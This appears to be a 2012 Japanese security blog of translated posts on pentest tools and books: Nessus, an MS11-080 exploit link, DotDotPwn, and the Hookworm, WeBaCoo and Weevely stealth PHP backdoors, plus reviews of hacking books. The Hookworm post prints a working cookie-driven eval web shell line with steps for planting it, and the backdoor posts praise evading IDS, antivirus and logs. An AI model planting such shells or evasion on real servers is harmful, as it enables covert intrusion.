2012年12月3日月曜日

[英⇒日]Nessus HTML5 Interface Beta が公開!

(元記事は http://blog.tenablesecurity.com/2012/10/nessus-html5-interface-beta.html)



今までは、NessusのインタフェースはFlashを使用していて、開発プラットフォームとして多くの利点もありましたが、欠点もたくさんありました。 Nessusに実装したのがFlashインターフェイスだった理由の一つは、Flashが "すべてのブラウザで同じように動作する"と点で(ただし必ずしもそうではない場合もあることが判明している)、そしてクライアントの実行なくらいには高 速だったという点でした(現在は最新のjavascriptによって追い抜かれている)。またFlashは、良質とはいえない "モバイル"ユーザーエクスペリエンスしか提供しておらず、全く利用できない場合もあります。というわけで、標準ベースのテクノロジーを使用するほうが合 理的だろうということで、HTML5へ移行しているわけです。


ですからHTML5インターフェースをパブリックベータ版としてリリースしました - デフォルトNessusのインターフェイスは、まだ今のところはFlashになりますが、Flashがインストールされていないブラウザを使用してスキャ ナに接続した場合や、または正しいURLに直接行った場合には、HTML5クライアントのベータ版を使用するオプションを持つことになります。

HTML5ベータインターフェイスは、https://localhost:8834/html5.htmlというURLにアクセスすることですぐに使用できます(localhostにはあなたのNessusサーバのIPアドレスまたはドメイン名が入ります)。Nessusプラグインが最新であることを確認してくださいね。


我々はHTML5のクライアントに満足がいったので、それをデフォルトのインターフェイスしますが(11月中旬〜試験的に)、お好みによっては、Flashの インターフェイスを使用するオプションもまだあります。HTML5のインターフェイスのこの最初の模索の目標は、Flashのものと同じ機能を提供するこ とですが、将来も視野に入れて構築しています。インターフェイスを動かすためのバックエンドでのたくさんの処理は、ほとんどのプラットフォームで、迅速か つスムーズに動作するようになっています。

HTML5ベータインタフェースは、現在次に示すウェブブラウザをサポートしています:

Safari
Firefox
Chrome
Opera
IE 9
IE 10(Windows 8のバグのため、IE10のTLSv1かNessus 5.0.2のどちらかを無効にする必要があります。)

以下に示すのは、HTML5でのNessusインターフェイスの概観です:
元ページで画像を見る

2012年4月4日水曜日

[英⇒日]MS11-080 ローカルの権限昇格


MS11-080 – CVE-2011-2005
こ のグレートな小型Pythonスクリプトは、権限を昇格させて、SYSYEMシェルを奪い取る。これは、Windows XP SP3およびWindows 2003 SP2上で動作する。標準の非管理者ユーザーとしてスクリプトを実行すると、権限を昇格させて、Afd.sysを介してシステムを制圧する。

被害者のシステムにPythonがインストールされている必要があり、少し面倒ですが、近いうちに.exe形式のエクスプロイトになると確信しています



 

Microsoftの記事:
http://technet.microsoft.com/en-us/security/bulletin/ms11-080
Exploit:
http://www.exploit-db.com/exploits/18176/~~V

2012年2月16日木曜日

DotDotPwn - ディレクトリトラバーサルFuzzer 3.0

(元記事はこちら)

DotDotPwnは、非常に柔軟でインテリジェントなfuzzerで、Web / FTP / TFTPなどのサーバのソフトウェアや、CMS、ERP、BlogといったWebプラットフォームで、ディレクトリトラバーサルの脆弱性を発見できる。また、プロトコルに依存しないモジュールがあり、お望みどおりのペイロードを、指定されたホストとポートへ送信できる。一方で、STDOUTモジュールを使用して、スクリプティングの方法で使用することもできる。

変更点 :複数の新しいスイッチとエンコーディングが追加されました。

2012年2月15日水曜日

Hookworm:ステルスPHPバックドア!

(元記事はこちら)

Weevelyだとか 、最近ではWeBaCoo に関する記事を覚えているのなら、私たちが何の話をするのかおわかりだろう。そう - ステルス、クッキーベース、Webバックドアだ。今回はフックワームについてだ。

 リモートシェルスクリプトバックドアを使用する状況といえば、リモートサーバ上にコマンドを発行しやすくしたい時だ。その機能は様々で、プログラミング言語も様々、サイズも様々だ。URLの引数を評価するシンプルなスクリプトもあり、関数を使ってそれらを実行し、結果をWebページに表示し、ポイント・アンド・クリックによる操作を備えた複雑なユーザーインターフェイスで、陥落後の多くアクティビティをこなしてくれる。URLの引数を評価するスクリプトの問題点は、どんなシェルが使用されたのかという証拠を多量のログファイルとして残してしまうことだ。第二に、それらのほとんどは、アップロードされたサーバ上のコマンドサポートにおける、静的な性質に依存して構築されている。HTTP GETおよびPOST変数は簡単に観測でき、検出や監査証跡の形成をしやすくしてしまうだろう。

 こういった不安要素すべてを念頭において、 Hookworm製作者 - Mr.ジャスティンクラインキーンは、より巧妙なバックドアの構築にとりかかった。彼は、悪意のあるペイロードを運ぶために使用できる、クライアントとサーバー間で渡される数多くの見落とされがちなHTTP変数が存在することに気付いた。Hookwormは、単にブラウザによって送信されたクッキーを探して、クッキーのペイロードの制約にもかかわらず、大規模なデータを送信するために、クッキー、任意の数の間の応答を分割することによって応答します。クッキーが持つのは限られたデータを運ぶ能力で、容量には制限がある(4096バイト)。しかし、RFC 2109によれば、サイトがクライアントに設定できるCookieの数の制限は、非常に高くなっている。これはクライアントが制御するものなので、数字は、あなたの望むままにできてしまう!

では、どのように実際に鉤虫を実行するのだろう?あなたがする必要があるのは、ターゲットシステム上のファイルを編集できるような、PHPアプリケーションの脆弱性を見つけることだ。SQLインジェクション脆弱性の発見なら、私に任せて。ファイルのアップロード、あるいはリモートファイルインクルージョンが動作するものだろうと、見つけることは難しくない。


<?php if(isset($_COOKIE['c'])) {eval($_COOKIE['c']); echo $_COOKIE['d'] . $r . $_COOKIE['d'];}?>
 
を対象となるWebページへ追加すればいい。ここで、'c'cookieがペイロードコマンドを運ぶのに対して、'd'のcookieは区切り文字を保持し、クライアントが余分なHTMLを取り除いて表示できるようになっている。このコードが、ホストのPHPページに注入されると、Hookwormのデータは応答の中にカプセル化され、Hookwormクライアントによって簡単に解釈できるようになる。次のコマンドラインで鉤虫PHPクライアントを実行する:
 
 $ php hookworm.php
 
スクリプトの相対パスによる、接続用IPを入力するよう求められる。スクリプトの場所を指示すれば出来上がりだ!シェルは君のものだ!

フックワームが備えているコマンド:

  1. shell_exec()とを介してコマンドをフォークする
  2. PHPのコマンドを発行する
  3. すべての。htaccessファイルを見つける
  4. すべての。htaccessファイルを見つける
  5. すべてのSUIDファイルを見つける
  6. ファイル名の[名前]を持つすべてのファイルを見つける
  7. すべての書き込み可能なファイルとフォルダを見つける
  8. マシン上で開いているポートを表示する
フックワームによる利点は、アップロードするファイルサイズの制限をあまり心配する必要がないことだ。セキュアな、HTTPSチャネルで接続すると、長い時間にわたるコントロールを設定できます。一旦"インストール"されてしまえば、システム上のhookwormを検出することは、ファイル変更の監視やHTTP / HTTPSリクエストを介して入ってくるクッキー検査を除けば、非常に困難になる、。
このツールは、概念の実証としてのみ開発されたものであり、悪意のある目的を意図したものではないことを念頭におく必要がある。

Download Hookworm:

Hookworm v1.0  hookworm.php/hookworm.php.tar.gz  http://www.madirish.net/sites/default/files/hookworm.php.tar.gz

2012年2月11日土曜日

[英⇒日]The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws

(Kindle版あり )

1118026470 978-1118026472 2

高評価のセキュリティ本が完全に更新されて、新版となって帰ってくる
Webアプリケーションは、大半の組織の正面玄関であり、これを露出させることは、個人情報の漏洩、不正な処理の実行、あるいは一般ユーザーへの侵害、といった攻撃につながる。この実用的な本は、完全な更新と改訂がなされ、進化し続けるWebアプリケーションを狙った攻撃とその防御の最新手法を、ステップバイステップで解説していく。初版以降に登場したWebアプリケーションにおける新採用の様々な技術にもお目にかかれるだろう。新たに開発された攻撃手法、特にクライアント側に関連するものも調査している。
  • 以前の版以降に登場した、Webアプリケーションを攻撃から守ることを目指した新技術や新技法を出し抜く方法を明らかに
  • 新たなリモート処理フレームワーク、HTML5、クロスドメインの統合技術、UI偽装、framebusting、HTTPパラメータの汚染、ハイブリッドファイル攻撃、なども解説
  • 著者が主催する共用Webサイトでは、説明される攻撃を読者が試してみることができ、各章の終わりに提起されている質問への回答を配ったり、さらに手法の要約やタスクのチェックリストも掲載されている
近年物事が急速に移り変わるWebアプリケーションセキュリティの分野に焦点を当て、本書は、探査、攻撃利用、Webアプリケーションのセキュリティ上の欠陥の防止、といった重要なトピックに関する最新のリソースだ。

カスタマーレビュー

 (※以降第1版のレビュー)
★★★★★ あなたが知っておくべきすべてのこと 2008年1月16日
By Jeff Pike (Mechanicsville, VA United States)
これは、少なくとも過去一年で書かれた中で、最も重要なITセキュリティのタイトルだ。なぜ?カスタムWebアプリケーションでは、聞き及ぶ既知の脆弱性の すべての組み合わせに対する、悪用の機会より多くを与えてしまう。この本は、様々なサブジェクトへの専門治療を施してくれる。727ページのボリュームな がら、記述は非常に明確で簡潔であることがわかる。不手際も最小限だ。すべてが明確に説明されているが、これは初心者の本ではない。著者は、あなたが HTML、JavaScriptなどを読み取ることができることを前提としている..普通は、このような本でが、いくつかの章は本当に良く、いくつかのま あまあの章があるといったところだが、そのケースは本書には当てはまらない。この本の3-18章を通して、すべてが堅固だ。もう一つの大きなプラスとし て、この本のツールは無料だ。

最初の数章では、文脈や背景情報を提示している。第3章は、Webアプリケーション技術に関する章で、特に有用な背景情報を与えてくれる。次からの666ページはすべて、アプリケーションの攻撃についてのものだ。

次の5つの章では、アプリケーション機能のマッピング、クライアント·サイドのコントロール、認証、セッション、およびアクセス·コントロールを扱ってい る。範囲は網羅的だ。私はこれらのトピックに馴染みがないわけでもないが、それぞれの章で、かなりのことを学べた。到達範囲の深さは驚くべきものだ。

次の6章は、本書の心臓部だ。インジェクション、パストラバーサル、アプリケーション·ロジック、XSSと関連攻撃、自動攻撃、情報漏洩を扱っている。 SQLインジェクションやクロスサイトスクリプティングのようなお馴染みの攻撃法だけでなく、今までほとんど聞いたこともないような攻撃にも、完全な対処 法を見つけられるだろう。危険性は現実的であり、これらの章は必読だ。

続く最後の4つの章では、コンパイルされたアプリケーション、アプリケーションアーキテクチャ、Webサーバー、およびソースコードへの攻撃を扱っている。 最後の2つの章は、クイックリファレンスとしていっそう有用だ。本全体を通して扱われるツールの概要が提示され、攻撃の方法論といったそれぞれの技術を攻 撃に利用するため方法も、本全体を通して論じられている。

情報の妥当性と価値に基づけば、この本が5点を獲るのは容易いだろう。


★★★★★ 開発者とセキュリティのプロの両方の優れたリソース
By Seth Fogie

まず余談として - このレビューは、幾レベルかバイアスされていることを白状し、認めておこう。一般公開されているWebアプリケーションセキュリティのコミュニティは小さ いので、出版物やプレゼンテーションは、フィールド内の他の注目を引くし、会話/レビュー/ブログコメントも頻繁に起こるだろう。なぜこのような言及を? ええと、Dafyddは彼のブログで、 XSS Attacksの レビューをしていた。私が、この分野における他のはるかにビッグなプレーヤーとともに共著した本だ。私もBurpには少なからず敬意を持っているし、 Dafyddが書いたプログラムは、ウェブアプリの重要な書籍のほとんどすべてで強調表示されている。だから、私が著者と無関係だと言ったら、誤解を招く だろう - 控えめに言ってもね。

さて、この本についてだが - 買うしかない、失望することはまずないだろう。私はこの本を読み通して(いくつかのおなじみの章はざっと目を通しただけだが)、フルタイムのWebアプリ ケーションの侵入テスターが、いかに多くのことを知っている必要があるのかという事実に圧倒された - こういったことはすべて、この本ではあの手この手で言及されている。実際、他の本で競争できるものがあるとは考えられない...

この分野に慣れていない人でも、またセキュリティの専門家や、あるいはWeb開発者でも、この本の釣り糸をたぐらずにはいられないだろう。セキュアなWeb アプリケーションの開発における、さまざまな側面の例証と実証も良い出来だ。経験豊かな多くの専門家には、あなたの記憶をリフレッシュさせて、忘れてし まったトリックやテクニックを思いおこすためのリソースとしてこの本が機能することは間違いない。この目的で役に立ってくれることは、すでに私で確認済み だ...

それでは、この本のさらに詳細を、どのへんから紹介していきましょう?個人的に、私は第20章から読み始めました - Webアプリケーションハッカーの方法論の章です。ここを読むことで、生活のかなりの部分をWebアプリの分解に費やしている著者の思考を覗きこむことに なるだろう。また、本書がこのようなレイアウトになっている理由も理解できるだろう - 単に、攻撃/侵入テストが行​​われる手順の並びという理由ではあるが。すべてを詳細に理解することは期待せず、再読するものとしよう。ただし、この本 が、興味深く読めるもので、すぐに実用的なコーディング/攻撃テクニックに切り変わってくるだろうという感覚はすぐに得られるはずだ。

この本は、いくつかの大きな部分に分かれている。最初のセクションは、用語、概念、実行環境などに順応するためのもので、本の残りの部分の基礎となるもの だ。ここには、サーバテクノロジに関する主要な各セクションの概観も含まれ、Webアプリケーションの機能はどのようなものか、そしてあなたが攻撃にさら される露出部の概要を説明しています。

次のセクションでは、攻撃者の観点から、後の分析のためにアプリケーションをマッピングするさまざまな方法を例証しながら、Webアプリケーションを見てい く。あなたがWeb開発者であれば、説明されるテクニックのひとつまたは複数は、サイト上に格納されている情報に少なからず懸念をもたらすものだというこ とを知る機会になるだろう - あなたのWeb​​サーバー上のものが安全だなんて思い込むことはもうできなくなるだろう。

​ ​この大きなセクションは、本書の中でも特に楽しいことが見つかる場所だ。基本的に、著者らは、次のWebアプリケーション攻撃を段階を追いながら実演し ていく - 認証、セッション管理、アクセス制御、コードインジェクション、Webサーバのバグ、ロジックエラー、そしてコンパイルされたアプリケーションのリバース エンジニアリング。各セクションでは、Webアプリケーションハッカーが(良くも悪くも)目標を達成するために使用する、攻撃経路とテクニックのほとんど すべてを、深く、包括的に把握できるだろう。

この本の素晴らしい点の一つは、理論だけにはとどまらないところです。問題を説明する実用的な先の尖った実例が含まれていて、しかし、目的のないソースコー ドで何ページもつかってスペースを埋めるだとかして、読者の時間を無駄にするようなことはない。736ページにわたって、この本には、埋め物の入り込む余 地はない。

攻 撃利用の例に加えて、著者らはまた、必要とされる `防護"の側面もとりあげ、Web開発者が、特定の攻撃に対して、どのようにアプリケーションを強化したらよいのかといったことを理解できるようにしてい る。私の経験では、Webアプリケーションを保護する方法を知ることは、多くの場合それを破る方法を知るより困難だ - だから、本書のこの部分を見ると、著者の洞察力の指標にできるだろう。

私が細心の注意を払った3つのセクションがある - 対象が私の仕事に関わるものだというのも理由の一つではあるが、提示されるコンセプトを私が気に入ったからでもある。ひとつめは11章、アプリケーショ ン·ロジックの攻撃を扱う章だ。この章では、著者らは、Function - Assumption - Attackプロセスを用いて、問題とその攻撃利用の方法を浮かび上がらせる。論理エラーは100%ヒューマンエラーに基づくものなので、良い例なしに分 類したり説明することは非常に困難だ。だから、他の人がどのように失敗したのか、攻撃がどのような障害をもたらしたのか、といったことを確認することに なったのだが、まるで物語のように読めた。

次のセクションは、第12章 - 他のユーザーへの攻撃だ。このセクションでは、XSS、XSRF、などの主題に跳び込んでいく - 全体を通して、私のXSS攻撃に関する著作と同様に、楽しめるものだった。

そして最後に、だが軽んじてはならないのは、しばしば見過ごされているWebアプリケーションのセキュリティの一側面を論じていることで、私が本当に気に 入っている - クライアントサイドの `シック·クライアント"でのリバースエンジニアリングだ。これが、Flash、Java、ActiveX、またはC + +のいずれでコード化されたプログラムだったとしても、クライアント側のコードをリバースエンジニアリングして、Webベースのアプリケーションに予期し ないコンテンツを挿入することが可能になってしまう。だから、この攻撃ベクトルを提示した著者には、称賛を送りたい。

それでは、本に何か問題はあるだろうか?まあ、厚いという事実を除いて - ない。この本はそこにある攻撃のほとんどすべてを理解するための優れた方法であり、あらゆるWeb開発者/セキュリティの専門家にとって貴重なリソースと なるだろう。主題に関するより具体的な詳細を知りたい場合は、その資料はさまざまな場所で見つかります - Cross Site Scripting Attacks: XSS Exploits and Defense, The Database Hacker's Handbook: Defending Database Servers, and Exploiting Online Games: Cheating Massively Distributed Systems (Addison-Wesley Software Security Series) が例です。

以上をまとめてみよう。The Web Application Hackers Handbookは、投資の価値がある、買いに行こう。



 ★★★★★ 初心者向けにも経験者向けとしても傑出している
By  R. Wesley McGrew
たとえ文字をお読みになる前であっても、"The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws"は、二つの理由からあなたの関心を惹くはずだ。第一点は、タイトルとカバーアートで、 Webセキュリティにおいて対をなす"The Shellcoder's Handbook"のWiley社によるものだ。私はすでに肯定的な評価を与えている第二の理由は、本が到着するまで私は気づいていなかったのだが、著者 のひとり、Dafydd Stuttardは、Burp Suiteという、Webアプリケーションの探索と攻撃利用のための、優れたツールの作者であるということだ。私はそのプロキシ機能を頻繁に使用してい て、そしてその唯一の理由が、ラップトップにJava VMをインストールしているからだということを、よく人に言っている。私は、そのような偉大なツールのセットの作成者によるWebアプリケーションのセ キュリティを読めることに非常に興奮し、そしてそれは私を失望させることはなかった。

私は、Webアプリケーションの攻撃に焦点を当てた他の本を読んでいないので、比較するものがないことは白状しておこう。とはいえ、私が言えることは、この 本は、アプリケーションのマッピングから攻撃利用まで、完全に徹底的にトピックを網羅しているということだ。数々の一般的な攻撃が扱われているが(例え ば、クロスサイトスクリプティングやSQLインジェクションなど)、本書の真の価値は、脆弱性を見つけるプロセスを教えてくれるところだ。これで武装すれ ば、あなたが探す、アプリケーションに固有の論理エラーを伴う問題を、より効果的に発見することができるだろう。この本は最初から最後までとてもよくでき ていて、それぞれの章では、作者がまとめたWebアプリケーションをハッカーの方法論を、それぞれまったく異なる手順で構築していく​​。

扱うトピックは、メーリングリスト上でアプリケーションの日報に開示されるような脆弱性の大部分を包含している。特定の攻撃のための章立てというよりむし ろ、著者らが収集したもの有意なカテゴリごとに分けて、関連するコンテンツと一緒に提示している。たとえば、SQLインジェクションおよびremote- file-inclusionは、 "Injecting Code"の章に配置されている。同様に、クロスサイトスクリプティング攻撃、セッション固定、リクエスト·フォージェリは、 "他のユーザーへの攻撃"の章が扱っている。はじめのほうにある"Webアプリケーションの技術"の章には入門資料があるが、しかしこの本を手に取るので あれば、Webアプリケーションの仕事や、開発者の観点、または攻撃の基礎への理解、のどれかに多少なりとも馴染みがあるほうが望ましいだろう。各章の終 わりにある質問は、読者が各章の本質を理解しているかをテストするようにデザインされており、私は、少なくともそれを読んで、いくつか考えを得られるくら いには役に立ったと考えています。Webセキュリティの入門者の方ならおそらく、それぞれの質問が焦点を当てるものから、多くの価値を得られるだろう。

このような大規模な本において、明らかなエラーに出会わなかったというのは、非常にうれしい驚きだ。本のためのウェブサイトは非常に完全で、各章の終わりの 質問すべてに対する答え、ある章で開発したツールのソースコード、文中で説明されるツールのリスト、および最後の章で説明する方法論のチェックリスト、と いったものが掲載されている。あなたがWebアプリケーションのセキュリティに関心を持っているのであれば、この本を手に取ることを強くおすすめしたい。 とりわけアプリケーションの脆弱性の監査に興味があるのであればなおさらだ。さらに、Webアプリケーションの開発者にとっても、この本にはたくさんのメ リットがあるだろう。あなたのアプリケーションに対する攻撃がどのように行われるかを知っておくのは重要で、本書には各攻撃の軽減策が記載されている。

私はこの本を楽しめたし、載っているテクニックが有用だと分かったので、手法を活用することも計画している。
 
 

2012年2月2日木曜日

[英⇒日]Sandcatブラウザ:侵入テスト指向のWebブラウザ!

 私たちは、SandCatGeloといったツールを長年使ってきて、今もSyhunt製品のファンだ。だからフェリペアラゴン - Syhuntの創設者 - が数ヶ月前私達にSandcatブラウザのことを知らせてくれてからは、それをテストする日を待ち望んでいた。今日は、Sandcatブラウザがリリースされるまさにその日だ。
Sandcatブラウザはフリーウェアであり、 ポータブルで 、 侵入テスト指向の、マルチタブウェブブラウザで、拡張機能もサポートしている。Google Chromeブラウザにもとづく、Chromiumのエンジン上に構築されており、Lua言語を使用した拡張機能やスクリプトもサポートしている。実質的に最速のWebブラウザが、世界最速のスクリプト言語と組み合わされていて、ペンテスターのため機能も満載だ!Luaは、強力、高速、軽量、組み込み可能なスクリプト言語で、シンプルな手続き型構文と、連想配列と拡張可能なセマンティクスに基づく強力なデータ記述構造が組み合わされている。
Sandcatブラウザの機能:
  • Live HTTPヘッダ
  • Request Editorの拡張
  • ファザーの拡張機能で複数モードとフィルターのサポート
  • JavaScript Executor拡張で、外部のJavaScriptファイルのロードと実行を可能にする
  • Lua Executor拡張で、外部Luaスクリプトのロードと実行を可能にする
  • Syhunt Gelo
  • HTTPブルートフォース、CGIスキャナのスクリプト、などなど。


さらに、Sandcatのブラウザは、システム上で重いものではない。必要とするfree RAMは128 MBで、空きディスク領域は100MBだけでいい。Windows XP、2003、2008、Vistaおよび7、上で効率的に実行される。唯一の問題としては、拡張機能とpropreitaryCatSensetechnologyという、SandCatのプロフェッショナルバージョンに含まれている機能は収録されていない。さらに、現在のバージョンでは、リクエストをリプレイすることはできない。
あくまでベータ版としてのリリースであり、あまり多くを求めてはならないだろう。安定版リリースを楽しみにしている。我々の知る限り、ブラウザのエンジンは素晴らしい。ひとつめのボタンをクリックすることで、一時的に" 拡張機能 " アクセスすることはできます。既に自前のLUAあるいはJavaScriptをお持ちであれば、"scripts"フォルダに置いて実行するか、またはextensionsタブにペーストすることで実行できる。

Sandcatブラウザをダウンロード:

Sandcat Browser 1.5  sandcat-browser-1.5.zip  http://www.syhunt.com/?n=Sandcat.Browser

2012年1月31日火曜日

[英⇒日]WeBaCoo:ウェブ バックドア クッキー!



WeBaCooは小さなステルスPHPバックドアです 。我々は、その作者であるMr.Anestis BechtsoudisによるSubmit Your Tool option経由で、このツールを知りました。類似の記事にはweevely のものがあります。

WeBaCooは、Web Backdoor Cookieの略で、データ転送にHTTPCookie Headerを使用します。リモート"端末"接続をシミュレートするために、 backdoorのついたサーバをつかいます。言い換えれば、WeBaCooはシェルコマンドを、HTTPのヘッダフィールドに隠して送信し、サーバの出 力には、HTMLコードの一部としてしか出力されません。執行するにはPHPの知識をいくらか持っている必要がありますが、ありがたいことにいくつかの R&Dが助けてくれるでしょう。

WeBaCoo の裏側にある一般概念は非常にシンプルです。第一に、バックドアのPHPコードは、主要なPHPのシステム関数を含むペイロードを使用して生成され、基本的なCookie処理メカニズムのもとで動作します。その後このコードは注入され、完了するとクライアントはシェルコマンドを送ることができます。 Cookieヘッダに隠され、Base64エンコーディングで難読化されます。サーバー側ではシェルコマンドが実行され、出力はCookieヘッダで隠さ れて(ba​​se64でのエンコードも同様)、クライアントに送信されます。この種のコンセプトの利点は、通信データのステルス性がかなり高く、標準的 な構成のアプリケーションファイアウォールやIDS / IPSに引っかかることがないので、クリーニングするログの数が少なくて済むことです!


事前定義されたペイロードを使用してPHPバックドアのコード作成を行う、生成モードを備えています。また、"ターミナル"モードも備えています。ユーザーがサーバーとのリモート"端末"接続を確立し、稼働中のWebサービスのお望みのコマンドをユーザー権限 で実行できるものです。

GPLv3 ライセンスの下で、Perlで書かれ、そしてGithubでホストされています。最近はPerlを実行できるシステムを見つけることは難しくないはずです! 著者はまた何か計画しているとのことで、将来のリリースが楽しみです。なので、TOR/ Proxyのサポートや、クッキーの名前の動的な変更といった機能も、もう間もなくです!

 

Download WeBaCoo

WeBaCoo v0.1.1anestisb-WeBaCoo.ziphttp://github.com/anestisb/WeBaCoo/zipball/master

2012年1月30日月曜日

[英⇒日]weevely:ステルス小型PHPバックドア!

 (元記事はこちら)

Weevelyをつかうと、ほとんど検出できないように設計されたPHPトロイを、作成および管理できます。このソフトウェアは、目立ちにくいPHPバックドアの概念実証であり、telnetライクな接続、HTTPリファラーの隠しデータ、システムライクな機能の動的なプローブの使用を完全にシミュレートし、PHPのセキュリティ上の封鎖をすり抜けます。PHPコードを生成してWebサーバをトロイ化させ、telnetクライアントのように振る舞わせてコマンドを実行させたり、backdoor化されたサーバー上に付加的な機能を注入したりします。 weevelyはblachbox Linuxのにも収録されており、詳細な説明はこちら 
weevelyの特徴 
  • Coded requests:バックドアサーバとクライアント間の通信は、通常のHTTPリクエストを介して行われ、コード化されたコマンドが織り込まれたもっともらしい偽のHTTP_REFERERヘッダフィールドをつかって、NIDSのモニタリングとHTTPログファイルのレビューからトラフィックを隠蔽します。
  • PHP security bypass :このプログラムで迂回を試みているものは、PHPの設定のうち、賢い外部プログラム実行機能を無効化させてしまうものです。このオプション有効にすると、php.iniに記述された機能を無効にします。Weevelyはさまざまなシステム関数を試して((system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval())リモートサーバ上で有効化されている機能を見つけ利用します。
  • 小型サーバ :バックドアサーバのコードは小さく、他のPHPファイルに簡単に紛れ込ませることができます。コアは動的に暗号化され、パターンマッチングコントロールをバイパスすることを狙っています。
  • モジュール性:バックドアサーバの機能をインクリメントするのはモジュールをつかえば簡単になります。バックドアを介してPHPのコードを注入して、リモートサーバ上に新しい機能を実装します。新しいモジュールのコー​​ドとロードは、本当に簡単です。現在の追加モジュールは次のとおり :安全なモードの確認、ファイルの読み取り、リモートサーバ上のファイルのダウンロード、書き込み可能なパス検索。
  • 確かに、インストールしておくと、サーバがコントロール下にあり、リモートで制御したい場合にはよさそうです。オープンソースなので、アンチウイルスによって検出されるようになった場合には変更を加えることができます。

    Download Weevely v0.3 (weevely-0.3.tar.gz) here.

    2012年1月24日火曜日

    [英⇒日]A Guide to Kernel Exploitation: Attacking the Core




    1597494860 978-1597494861 September 15, 2010 1


    ユーザランドのエクスプロイテーションに対しては、数多くのセキュリティ対策がとられるようになっている。そのため、カーネルエクスプロイテーションは、エクスプロイト作成者や攻撃者の間に、急激に浸透しつつある。オ ペレーティングシステムの心臓部でプレーするゲームは危険をみちびく:この本は、信頼性があり効果的なカーネルレベルのエクスプロイトの開発に必要な、手 法の理論面およびアプローチをカバーしており、さまざまなオペレーティングシステムに応用している(LinuxやSolaris、Mac OS X、およびWindows)。カーネルのエクスプロイトには、芸術と科学の両方が要求される。それぞれOSには癖があり、各エクスプロイトはそのターゲットをうまく利用できるように成形をくわえる必要がある。本書が論じるのは、最もポピュラーなOSファミリ - UNIX派生物、Mac OS X、およびWindowsベース - であり、そしてそれらを完全に制御する方法だ。コンセプトと戦術が分類的に提示されているのは、特に詳細なエクスプロイトにパッチを適用するようなときのためで、あなたが基本的な情報を読めば、より新しい、より巧妙な攻撃や、あるいはより具体的な設計と防御構造を書いていくときに役立つだろう。
    • 広範囲のオペレーティングシステムファミリをカバーしています - UNIX派生、Mac OS X、Windows。
    • 一般的なメモリ破壊(スタックオーバーフロー、ヒープオーバーフローなど)の問題や、論理的なバグや競合状態といった一般的なシナリオを詳術している
    • 読者を、ユーザランドの搾取からカーネルランド(OS)搾取/攻撃の世界へ導き、巧い技術の創出につながるステップに特に焦点を当て、読者に小手先以上の何かをつかんでもらうことを目的としている 


    カスタマーレビュー

    ★★★★★  読みやすく、有益で、簡潔、ただし注意点が2    2010104
     By  DDDDDDD (USA)
    同僚は私に、この本を見せてくれた(フルに全体をね:彼はレビュアーなんです) - 彼のOS IIクラスの生徒にもそれを購入させているそうだ(学期の真ん中の割り当て!)一週間前 - 印刷されたてほやほやが届きました。私はコピーを2つとった。ひとつはオフィス用、そしてもう1つはバスで読むため。  

    3
    本の指に入る脆弱性の技術書の一つで、もし私が荒廃した、ネットワーク化された、電気のとおった孤島に行くことがあったら持っていくだろう。パート1:カーネルランド(イントロと解説)への旅は、私が今まで見た中で最も簡潔明確なイントロの一つだ。講義用のドキュメントとして配布してもらえたらいいのに。Windowsに関するセクションは現行のもので、上手く書かれている。また、32および64ビットにおけるアーキテクチャとアプローチの違いが強調されている(Eilamの本は悲しいかなそうではない、とても良いんだけどね) - そのためこの本は最新だといえる。私はUnixのセクションにはアップデートが必要だと思った。とはいえ、私の同僚によると、エクスプロイトのいくつかは2006/2007でも可能で、ただしカーネルの変更にともない、いくつかのAPIなどは利用できなかったりするとのこと。このへんはアップデートが必要だろう。Macのセクションについては、専門外なのでコメントはできない。  
    利用可能なウェブサイトと有用な例:[...]  要望リスト:  

    1)
    やむを得ないタイポもいくつかある、確認を: p.10: MAC はセキュリティの文脈では Media Access Control ではなく、 Mandatory Access Controlだろう 
    2
    )ハイパーバイザと仮想化に関するセクションを拡大してくれたら本当に本当にありがたい(最後にはミニエピローグもある)- 楽しめるものになるに違いない  
    3
    Linuxのケーススタディは、きちんとしている - 次のバージョンにおいては、WindowsStuxnetの手口を行ってほしい。そこにはカーネルのルートの興味深い攻撃経路のすべての種類が追加されているからだ  
    この本を購入しても後悔することはないだろう - それは明白なことで、中級者にも読みやすいガイドを作り、専門家の読者にも教科書のお供として何倍も役立てられるようにとする、著者らの多大な努力を高く評価したい。  

    Daniel Bilar 
    CS Department 
    UNO

     
    ★★★★★  カーネルエクスプロイテーションに関する優れた書籍   20101019
    By  Blake Self
     私は、この本が有益であるという期待をもち、カーネルエクスプロイテーションについての知見を喚起してくれそうだったので購入した - 私が失望することはなかった。いくつかの些細な誤植はさておき、私の評価では、この本は私が読んだエクスプロイテーションに関する書籍の中で、最もよく書かれた本の一つだ。仲間の学生や教授にも何度かそれを推奨している(私はコンピュータサイエンスの大学院生です)。カーネルの開発に興味を持っているのなら何方であれ、この本を強くお勧めする。私の考えでは、この本は現在、カーネルエクスプロイトにおいて、Phrack64 file 6以降で最良の情報源だ。

     
    ★★★★★   カーネルハッカーのための新たなバイブル   20101230
    By  Ari Elias Bachrach (Philadelphia PA)
    私は、カーネルのエクスプロイトを取り扱う多数の著作を読んできた。最も基本的なレベルのものだ。 - バッファを埋め、スタックポインタを上書きし、NOPスレッドを使用してコードを挿入する、といったものを。私は、この本がもたらす深さと幅広さに近づこうとすると、何も考えられなくなる。技術書の出だしというのは、実践から始まることはほとんどど無い - まずは理論だ。本の最初の部分は、カーネルの説明を扱う。カーネルエクスプロイトの様々なタイプを記述し、そしてカーネルの脆弱性に影響を与えうるアーキテクチャオプションについて長い考察をしている。本の2章は、実践的になる。 ここでは、OS3つの主要分野を深くカバーしている - WindowsMac、およびUnixだ。各カーネルが考察されており、その"特異性を解析し、ツールのおすすめもあり、デバッグも説明され、さらにカーネルエクスプロイトの以前からの多くの実例もあげられている。リモートエクスプロイテーションについての章もあり、そして本書は、現実世界のあらゆる実例と結び付くような素晴らしいケーススタディで締めくくられる。本書はすぐに、すべてのカーネルハッカーの書棚の必需品となるだろう。参照資料としても教育ガイドとしても。  
    本の技術的なレベルについてざっと書いておこう - Cを知っていて、カーネルがどのように機能するかについていくらか理解していて、そしてアセンブリについて少なくとも通り一遍の知識があることを前提としています。書中にはたくさんのコードがあり、親切なことに書籍のウェブサイトattackingthecore.comにそのすべてがおいてある。